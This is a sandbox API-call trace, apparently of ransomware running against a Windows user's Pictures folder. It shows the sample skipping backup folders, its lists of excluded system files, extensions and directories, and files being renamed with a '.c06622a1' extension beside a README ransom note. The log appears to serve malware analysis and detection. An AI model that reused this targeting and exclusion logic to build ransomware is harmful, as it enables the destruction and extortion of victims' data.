returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" [0167.742] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo") returned 0x48 [0167.742] wcscpy (in: _Dest=0x34800da, _Source="ZjSGQQ7rSaytFk_.gif" | out: _Dest="ZjSGQQ7rSaytFk_.gif") returned="ZjSGQQ7rSaytFk_.gif" [0167.742] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ZjSGQQ7rSaytFk_.gif", dwFileAttributes=0x80) returned 1 [0167.742] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ZjSGQQ7rSaytFk_.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\zjsgqq7rsaytfk_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0167.742] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.742] ReadFile (in: hFile=0x1ec, lpBuffer=0x32e724, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e7b4, lpOverlapped=0x0 | out: lpBuffer=0x32e724*, lpNumberOfBytesRead=0x32e7b4*=0x90, lpOverlapped=0x0) returned 1 [0167.743] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e724, Length=0x80) returned 0xda9898f0 [0167.743] RtlComputeCrc32 (PartialCrc=0x98f0, Buffer=0x32e724, Length=0x80) returned 0x30d72934 [0167.743] RtlComputeCrc32 (PartialCrc=0x2934, Buffer=0x32e724, Length=0x80) returned 0x2d8e8120 [0167.743] RtlComputeCrc32 (PartialCrc=0x8120, Buffer=0x32e724, Length=0x80) returned 0xcc72cb42 [0167.743] RtlComputeCrc32 (PartialCrc=0xcb42, Buffer=0x32e724, Length=0x80) returned 0x54c85504 [0167.743] CloseHandle (hObject=0x1ec) returned 1 [0167.743] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3282080 [0167.743] wcscpy (in: _Dest=0x3282080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ZjSGQQ7rSaytFk_.gif" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ZjSGQQ7rSaytFk_.gif") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ZjSGQQ7rSaytFk_.gif" [0167.743] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ZjSGQQ7rSaytFk_.gif") returned 0x5c [0167.743] wcscpy (in: _Dest=0x3282138, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.743] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ZjSGQQ7rSaytFk_.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\zjsgqq7rsaytfk_.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ZjSGQQ7rSaytFk_.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\zjsgqq7rsaytfk_.gif.c06622a1"), dwFlags=0x8) returned 1 [0167.746] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ZjSGQQ7rSaytFk_.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\zjsgqq7rsaytfk_.gif.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1ec [0167.746] CreateIoCompletionPort (FileHandle=0x1ec, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0167.746] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x38c0020 [0167.755] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x30bba5a1 [0167.755] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x324d710b [0167.755] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5691d4ea [0167.755] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7c114592 [0167.755] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x52676658 [0167.755] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x782236e1 [0167.756] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xe01561a [0167.756] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x101b6463 [0167.759] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x38c0094, Length=0x80) returned 0x3c02e424 [0167.759] RtlComputeCrc32 (PartialCrc=0xe424, Buffer=0x38c0094, Length=0x80) returned 0xacf4aa76 [0167.759] RtlComputeCrc32 (PartialCrc=0xaa76, Buffer=0x38c0094, Length=0x80) returned 0x2b37f9df [0167.759] RtlComputeCrc32 (PartialCrc=0xf9df, Buffer=0x38c0094, Length=0x80) returned 0x706b5679 [0167.759] RtlComputeCrc32 (PartialCrc=0x5679, Buffer=0x38c0094, Length=0x80) returned 0xacf4365b [0167.759] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x38c0020) returned 1 [0167.759] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480048) returned 1 [0167.759] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3282080) returned 1 [0167.759] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0167.759] FindClose (in: hFindFile=0x1541c8 | out: hFindFile=0x1541c8) returned 1 [0167.759] _wcsicmp (_Str1="backup", _Str2="_MTmDgixdwsa7RVqo") returned 3 [0167.759] wcslen (_String="backup") returned 0x6 [0167.759] _wcsicmp (_Str1="bak", _Str2="_MTmDgixdwsa7RVqo") returned 3 [0167.759] wcslen (_String="bak") returned 0x3 [0167.759] _wcsicmp (_Str1="back", _Str2="_MTmDgixdwsa7RVqo") returned 3 [0167.759] wcslen (_String="back") returned 0x4 [0167.759] _wcsicmp (_Str1="archive", _Str2="_MTmDgixdwsa7RVqo") returned 2 [0167.760] wcslen (_String="archive") returned 0x7 [0167.760] _wcsicmp (_Str1="bckp", _Str2="_MTmDgixdwsa7RVqo") returned 3 [0167.760] wcslen (_String="bckp") returned 0x4 [0167.760] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0167.762] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3262070) returned 1 [0167.762] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0167.763] FindClose (in: hFindFile=0x154188 | out: hFindFile=0x154188) returned 1 [0167.765] _wcsicmp (_Str1="backup", _Str2="iwvH BdfW9G") returned -7 [0167.765] wcslen (_String="backup") returned 0x6 [0167.765] _wcsicmp (_Str1="bak", _Str2="iwvH BdfW9G") returned -7 [0167.765] wcslen (_String="bak") returned 0x3 [0167.765] _wcsicmp (_Str1="back", _Str2="iwvH BdfW9G") returned -7 [0167.765] wcslen (_String="back") returned 0x4 [0167.765] _wcsicmp (_Str1="archive", _Str2="iwvH BdfW9G") returned -8 [0167.765] wcslen (_String="archive") returned 0x7 [0167.765] _wcsicmp (_Str1="bckp", _Str2="iwvH BdfW9G") returned -7 [0167.765] wcslen (_String="bckp") returned 0x4 [0167.765] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0167.765] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3230058) returned 1 [0167.766] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb24a000, ftCreationTime.dwHighDateTime=0x1d5e507, ftLastAccessTime.dwLowDateTime=0x4ce243f0, ftLastAccessTime.dwHighDateTime=0x1d5e729, ftLastWriteTime.dwLowDateTime=0x4ce243f0, ftLastWriteTime.dwHighDateTime=0x1d5e729, nFileSizeHigh=0x0, nFileSizeLow=0x13d2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LTMYS19lGfu.bmp", cAlternateFileName="LTMYS1~1.BMP")) returned 1 [0167.766] _wcsicmp (_Str1="LTMYS19lGfu.bmp", _Str2="README.c06622a1.TXT") returned -6 [0167.766] wcsstr (_Str="LTMYS19lGfu.bmp", _SubStr="README") returned 0x0 [0167.766] _wcsicmp (_Str1="autorun.inf", _Str2="LTMYS19lGfu.bmp") returned -11 [0167.766] wcslen (_String="autorun.inf") returned 0xb [0167.766] _wcsicmp (_Str1="boot.ini", _Str2="LTMYS19lGfu.bmp") returned -10 [0167.766] wcslen (_String="boot.ini") returned 0x8 [0167.766] _wcsicmp (_Str1="bootfont.bin", _Str2="LTMYS19lGfu.bmp") returned -10 [0167.766] wcslen (_String="bootfont.bin") returned 0xc [0167.766] _wcsicmp (_Str1="bootsect.bak", _Str2="LTMYS19lGfu.bmp") returned -10 [0167.766] wcslen (_String="bootsect.bak") returned 0xc [0167.766] _wcsicmp (_Str1="desktop.ini", _Str2="LTMYS19lGfu.bmp") returned -8 [0167.766] wcslen (_String="desktop.ini") returned 0xb [0167.766] _wcsicmp (_Str1="iconcache.db", _Str2="LTMYS19lGfu.bmp") returned -3 [0167.766] wcslen (_String="iconcache.db") returned 0xc [0167.766] _wcsicmp (_Str1="ntldr", _Str2="LTMYS19lGfu.bmp") returned 2 [0167.766] wcslen (_String="ntldr") returned 0x5 [0167.766] _wcsicmp (_Str1="ntuser.dat", _Str2="LTMYS19lGfu.bmp") returned 2 [0167.766] wcslen (_String="ntuser.dat") returned 0xa [0167.766] _wcsicmp (_Str1="ntuser.dat.log", _Str2="LTMYS19lGfu.bmp") returned 2 [0167.766] wcslen (_String="ntuser.dat.log") returned 0xe [0167.766] _wcsicmp (_Str1="ntuser.ini", _Str2="LTMYS19lGfu.bmp") returned 2 [0167.766] wcslen (_String="ntuser.ini") returned 0xa [0167.766] _wcsicmp (_Str1="thumbs.db", _Str2="LTMYS19lGfu.bmp") returned 8 [0167.766] wcslen (_String="thumbs.db") returned 0x9 [0167.766] _wcsicmp (_Str1="386", _Str2="bmp") returned -47 [0167.766] wcslen (_String="386") returned 0x3 [0167.766] _wcsicmp (_Str1="adv", _Str2="bmp") returned -1 [0167.766] wcslen (_String="adv") returned 0x3 [0167.767] _wcsicmp (_Str1="ani", _Str2="bmp") returned -1 [0167.767] wcslen (_String="ani") returned 0x3 [0167.767] _wcsicmp (_Str1="bat", _Str2="bmp") returned -12 [0167.767] wcslen (_String="bat") returned 0x3 [0167.767] _wcsicmp (_Str1="bin", _Str2="bmp") returned -4 [0167.767] wcslen (_String="bin") returned 0x3 [0167.767] _wcsicmp (_Str1="cab", _Str2="bmp") returned 1 [0167.767] wcslen (_String="cab") returned 0x3 [0167.767] _wcsicmp (_Str1="cmd", _Str2="bmp") returned 1 [0167.767] wcslen (_String="cmd") returned 0x3 [0167.767] _wcsicmp (_Str1="com", _Str2="bmp") returned 1 [0167.767] wcslen (_String="com") returned 0x3 [0167.767] _wcsicmp (_Str1="cpl", _Str2="bmp") returned 1 [0167.767] wcslen (_String="cpl") returned 0x3 [0167.767] _wcsicmp (_Str1="cur", _Str2="bmp") returned 1 [0167.767] wcslen (_String="cur") returned 0x3 [0167.767] _wcsicmp (_Str1="deskthemepack", _Str2="bmp") returned 2 [0167.767] wcslen (_String="deskthemepack") returned 0xd [0167.767] _wcsicmp (_Str1="diagcab", _Str2="bmp") returned 2 [0167.767] wcslen (_String="diagcab") returned 0x7 [0167.767] _wcsicmp (_Str1="diagcfg", _Str2="bmp") returned 2 [0167.767] wcslen (_String="diagcfg") returned 0x7 [0167.767] _wcsicmp (_Str1="diagpkg", _Str2="bmp") returned 2 [0167.767] wcslen (_String="diagpkg") returned 0x7 [0167.767] _wcsicmp (_Str1="dll", _Str2="bmp") returned 2 [0167.767] wcslen (_String="dll") returned 0x3 [0167.767] _wcsicmp (_Str1="drv", _Str2="bmp") returned 2 [0167.767] wcslen (_String="drv") returned 0x3 [0167.767] _wcsicmp (_Str1="exe", _Str2="bmp") returned 3 [0167.767] wcslen (_String="exe") returned 0x3 [0167.768] _wcsicmp (_Str1="hlp", _Str2="bmp") returned 6 [0167.768] wcslen (_String="hlp") returned 0x3 [0167.768] _wcsicmp (_Str1="icl", _Str2="bmp") returned 7 [0167.768] wcslen (_String="icl") returned 0x3 [0167.768] _wcsicmp (_Str1="icns", _Str2="bmp") returned 7 [0167.768] wcslen (_String="icns") returned 0x4 [0167.768] _wcsicmp (_Str1="ico", _Str2="bmp") returned 7 [0167.768] wcslen (_String="ico") returned 0x3 [0167.768] _wcsicmp (_Str1="ics", _Str2="bmp") returned 7 [0167.768] wcslen (_String="ics") returned 0x3 [0167.768] _wcsicmp (_Str1="idx", _Str2="bmp") returned 7 [0167.768] wcslen (_String="idx") returned 0x3 [0167.768] _wcsicmp (_Str1="ldf", _Str2="bmp") returned 10 [0167.768] wcslen (_String="ldf") returned 0x3 [0167.768] _wcsicmp (_Str1="lnk", _Str2="bmp") returned 10 [0167.768] wcslen (_String="lnk") returned 0x3 [0167.768] _wcsicmp (_Str1="mod", _Str2="bmp") returned 11 [0167.768] wcslen (_String="mod") returned 0x3 [0167.768] _wcsicmp (_Str1="mpa", _Str2="bmp") returned 11 [0167.768] wcslen (_String="mpa") returned 0x3 [0167.768] _wcsicmp (_Str1="msc", _Str2="bmp") returned 11 [0167.768] wcslen (_String="msc") returned 0x3 [0167.768] _wcsicmp (_Str1="msp", _Str2="bmp") returned 11 [0167.768] wcslen (_String="msp") returned 0x3 [0167.768] _wcsicmp (_Str1="msstyles", _Str2="bmp") returned 11 [0167.768] wcslen (_String="msstyles") returned 0x8 [0167.768] _wcsicmp (_Str1="msu", _Str2="bmp") returned 11 [0167.768] wcslen (_String="msu") returned 0x3 [0167.768] _wcsicmp (_Str1="nls", _Str2="bmp") returned 12 [0167.768] wcslen (_String="nls") returned 0x3 [0167.769] _wcsicmp (_Str1="nomedia", _Str2="bmp") returned 12 [0167.769] wcslen (_String="nomedia") returned 0x7 [0167.769] _wcsicmp (_Str1="ocx", _Str2="bmp") returned 13 [0167.769] wcslen (_String="ocx") returned 0x3 [0167.769] _wcsicmp (_Str1="prf", _Str2="bmp") returned 14 [0167.769] wcslen (_String="prf") returned 0x3 [0167.769] _wcsicmp (_Str1="ps1", _Str2="bmp") returned 14 [0167.769] wcslen (_String="ps1") returned 0x3 [0167.769] _wcsicmp (_Str1="rom", _Str2="bmp") returned 16 [0167.769] wcslen (_String="rom") returned 0x3 [0167.769] _wcsicmp (_Str1="rtp", _Str2="bmp") returned 16 [0167.769] wcslen (_String="rtp") returned 0x3 [0167.769] _wcsicmp (_Str1="scr", _Str2="bmp") returned 17 [0167.769] wcslen (_String="scr") returned 0x3 [0167.769] _wcsicmp (_Str1="shs", _Str2="bmp") returned 17 [0167.769] wcslen (_String="shs") returned 0x3 [0167.769] _wcsicmp (_Str1="spl", _Str2="bmp") returned 17 [0167.769] wcslen (_String="spl") returned 0x3 [0167.769] _wcsicmp (_Str1="sys", _Str2="bmp") returned 17 [0167.769] wcslen (_String="sys") returned 0x3 [0167.769] _wcsicmp (_Str1="theme", _Str2="bmp") returned 18 [0167.769] wcslen (_String="theme") returned 0x5 [0167.769] _wcsicmp (_Str1="themepack", _Str2="bmp") returned 18 [0167.769] wcslen (_String="themepack") returned 0x9 [0167.769] _wcsicmp (_Str1="wpx", _Str2="bmp") returned 21 [0167.769] wcslen (_String="wpx") returned 0x3 [0167.769] _wcsicmp (_Str1="lock", _Str2="bmp") returned 10 [0167.769] wcslen (_String="lock") returned 0x4 [0167.769] _wcsicmp (_Str1="key", _Str2="bmp") returned 9 [0167.769] wcslen (_String="key") returned 0x3 [0167.770] _wcsicmp (_Str1="hta", _Str2="bmp") returned 6 [0167.770] wcslen (_String="hta") returned 0x3 [0167.770] _wcsicmp (_Str1="msi", _Str2="bmp") returned 11 [0167.770] wcslen (_String="msi") returned 0x3 [0167.770] _wcsicmp (_Str1="pdb", _Str2="bmp") returned 14 [0167.770] wcslen (_String="pdb") returned 0x3 [0167.770] _wcsicmp (_Str1="sqlite", _Str2="bmp") returned 17 [0167.770] wcslen (_String="sqlite") returned 0x6 [0167.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 0x11 [0167.770] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3480048 [0167.770] wcscpy (in: _Dest=0x3480048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" [0167.770] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned 0x2a [0167.770] wcscpy (in: _Dest=0x348009e, _Source="LTMYS19lGfu.bmp" | out: _Dest="LTMYS19lGfu.bmp") returned="LTMYS19lGfu.bmp" [0167.770] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LTMYS19lGfu.bmp", dwFileAttributes=0x80) returned 1 [0167.771] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LTMYS19lGfu.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ltmys19lgfu.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0167.771] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.771] ReadFile (in: hFile=0x194, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0167.772] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xb657c10e [0167.772] RtlComputeCrc32 (PartialCrc=0xc10e, Buffer=0x32ec24, Length=0x80) returned 0x69d73874 [0167.772] RtlComputeCrc32 (PartialCrc=0x3874, Buffer=0x32ec24, Length=0x80) returned 0x66719476 [0167.772] RtlComputeCrc32 (PartialCrc=0x9476, Buffer=0x32ec24, Length=0x80) returned 0x1b93c062 [0167.772] RtlComputeCrc32 (PartialCrc=0xc062, Buffer=0x32ec24, Length=0x80) returned 0xc2054083 [0167.772] CloseHandle (hObject=0x194) returned 1 [0167.772] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0167.772] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LTMYS19lGfu.bmp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LTMYS19lGfu.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LTMYS19lGfu.bmp" [0167.772] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LTMYS19lGfu.bmp") returned 0x3a [0167.772] wcscpy (in: _Dest=0x32200c4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.773] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LTMYS19lGfu.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ltmys19lgfu.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LTMYS19lGfu.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ltmys19lgfu.bmp.c06622a1"), dwFlags=0x8) returned 1 [0167.774] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LTMYS19lGfu.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ltmys19lgfu.bmp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x194 [0167.774] CreateIoCompletionPort (FileHandle=0x194, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0167.774] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3950020 [0167.783] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3b37073e [0167.783] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3f8009eb [0167.783] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1649993d [0167.783] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x14e9df2e [0167.783] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5e2f2469 [0167.783] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5e0c9208 [0167.783] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6368a541 [0167.783] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x8ff4d35 [0167.786] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3950094, Length=0x80) returned 0x7161dd98 [0167.787] RtlComputeCrc32 (PartialCrc=0xdd98, Buffer=0x3950094, Length=0x80) returned 0x951a4167 [0167.787] RtlComputeCrc32 (PartialCrc=0x4167, Buffer=0x3950094, Length=0x80) returned 0x61d22ab2 [0167.787] RtlComputeCrc32 (PartialCrc=0x2ab2, Buffer=0x3950094, Length=0x80) returned 0x2b439c2d [0167.787] RtlComputeCrc32 (PartialCrc=0x9c2d, Buffer=0x3950094, Length=0x80) returned 0x4783c98f [0167.787] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3950020) returned 1 [0167.787] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480048) returned 1 [0167.788] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0167.789] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x913d0240, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x913d0240, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x913f63a0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0167.789] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0167.789] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa36095e0, ftCreationTime.dwHighDateTime=0x1d5dd17, ftLastAccessTime.dwLowDateTime=0x947776a0, ftLastAccessTime.dwHighDateTime=0x1d5dc4c, ftLastWriteTime.dwLowDateTime=0x947776a0, ftLastWriteTime.dwHighDateTime=0x1d5dc4c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XGqrhHf_R", cAlternateFileName="XGQRHH~1")) returned 1 [0167.789] _wcsicmp (_Str1="$recycle.bin", _Str2="XGqrhHf_R") returned -84 [0167.789] wcslen (_String="$recycle.bin") returned 0xc [0167.789] _wcsicmp (_Str1="config.msi", _Str2="XGqrhHf_R") returned -21 [0167.789] wcslen (_String="config.msi") returned 0xa [0167.789] _wcsicmp (_Str1="$windows.~bt", _Str2="XGqrhHf_R") returned -84 [0167.789] wcslen (_String="$windows.~bt") returned 0xc [0167.789] _wcsicmp (_Str1="$windows.~ws", _Str2="XGqrhHf_R") returned -84 [0167.789] wcslen (_String="$windows.~ws") returned 0xc [0167.789] _wcsicmp (_Str1="windows", _Str2="XGqrhHf_R") returned -1 [0167.789] wcslen (_String="windows") returned 0x7 [0167.789] _wcsicmp (_Str1="appdata", _Str2="XGqrhHf_R") returned -23 [0167.789] wcslen (_String="appdata") returned 0x7 [0167.789] _wcsicmp (_Str1="application data", _Str2="XGqrhHf_R") returned -23 [0167.789] wcslen (_String="application data") returned 0x10 [0167.789] _wcsicmp (_Str1="boot", _Str2="XGqrhHf_R") returned -22 [0167.789] wcslen (_String="boot") returned 0x4 [0167.789] _wcsicmp (_Str1="google", _Str2="XGqrhHf_R") returned -17 [0167.789] wcslen (_String="google") returned 0x6 [0167.789] _wcsicmp (_Str1="mozilla", _Str2="XGqrhHf_R") returned -11 [0167.789] wcslen (_String="mozilla") returned 0x7 [0167.789] _wcsicmp (_Str1="program files", _Str2="XGqrhHf_R") returned -8 [0167.789] wcslen (_String="program files") returned 0xd [0167.789] _wcsicmp (_Str1="program files (x86)", _Str2="XGqrhHf_R") returned -8 [0167.789] wcslen (_String="program files (x86)") returned 0x13 [0167.789] _wcsicmp (_Str1="programdata", _Str2="XGqrhHf_R") returned -8 [0167.790] wcslen (_String="programdata") returned 0xb [0167.790] _wcsicmp (_Str1="system volume information", _Str2="XGqrhHf_R") returned -5 [0167.790] wcslen (_String="system volume information") returned 0x19 [0167.790] _wcsicmp (_Str1="tor browser", _Str2="XGqrhHf_R") returned -4 [0167.790] wcslen (_String="tor browser") returned 0xb [0167.790] _wcsicmp (_Str1="windows.old", _Str2="XGqrhHf_R") returned -1 [0167.790] wcslen (_String="windows.old") returned 0xb [0167.790] _wcsicmp (_Str1="intel", _Str2="XGqrhHf_R") returned -15 [0167.790] wcslen (_String="intel") returned 0x5 [0167.790] _wcsicmp (_Str1="msocache", _Str2="XGqrhHf_R") returned -11 [0167.790] wcslen (_String="msocache") returned 0x8 [0167.790] _wcsicmp (_Str1="perflogs", _Str2="XGqrhHf_R") returned -8 [0167.790] wcslen (_String="perflogs") returned 0x8 [0167.790] _wcsicmp (_Str1="x64dbg", _Str2="XGqrhHf_R") returned -49 [0167.790] wcslen (_String="x64dbg") returned 0x6 [0167.790] _wcsicmp (_Str1="public", _Str2="XGqrhHf_R") returned -8 [0167.790] wcslen (_String="public") returned 0x6 